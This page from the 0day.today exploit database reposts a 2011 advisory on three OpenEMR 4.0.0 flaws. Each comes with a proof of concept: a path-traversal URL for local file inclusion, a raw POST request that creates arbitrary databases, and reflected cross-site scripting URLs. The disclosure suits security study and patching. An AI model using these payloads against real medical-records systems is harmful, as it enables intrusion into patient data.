[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OpenEMR 4.0.0 Multiple Vulnerabilities

Author
AutoSec Tools
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15787
Category
web applications
Date add
06-04-2011
Platform
php
------------------------------------------------------------------------
Software................OpenEMR 4.0.0
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.oemr.org/
Discovery Date..........4/2/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
 
 
--Description--
 
A local file inclusion vulnerability in OpenEMR 4.0.0 can be exploited
to include arbitrary files.
 
 
--PoC--
 
http://localhost/openemr-4.0.0/index.php?site=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
 
------------------------------------------------------------------------
Software................OpenEMR 4.0.0
Vulnerability...........Arbitrary Database Creation/Database Enumeration
Threat Level............Low (1/5)
Download................http://www.oemr.org/
Discovery Date..........4/2/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
 
 
--PoC--
 
POST http://localhost/openemr-4.0.0/contrib/util/express.php HTTP/1.1
Host: localhost
Connection: keep-alive
User-Agent: x
Content-Length: 142
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
 
------x
Content-Disposition: form-data; name="submit"
 
submit
------x
Content-Disposition: form-data; name="newname"
 
DatabaseName
------x--
 
------------------------------------------------------------------------
Software................OpenEMR 4.0.0
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.oemr.org/
Discovery Date..........4/2/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
 
 
--Description--
 
A reflected cross-site scripting vulnerability in OpenEMR 4.0.0 can be
exploited to execute arbitrary JavaScript.
 
 
--PoC--
 
http://localhost/openemr-4.0.0/setup.php?site=%3Cscript%3Ealert(0)%3C/script%3E
 
http://localhost/openemr-4.0.0/gacl/admin/object_search.php?object_type=&action=&src_form=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E&section_value=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E



#  0day.today [2024-11-15]  #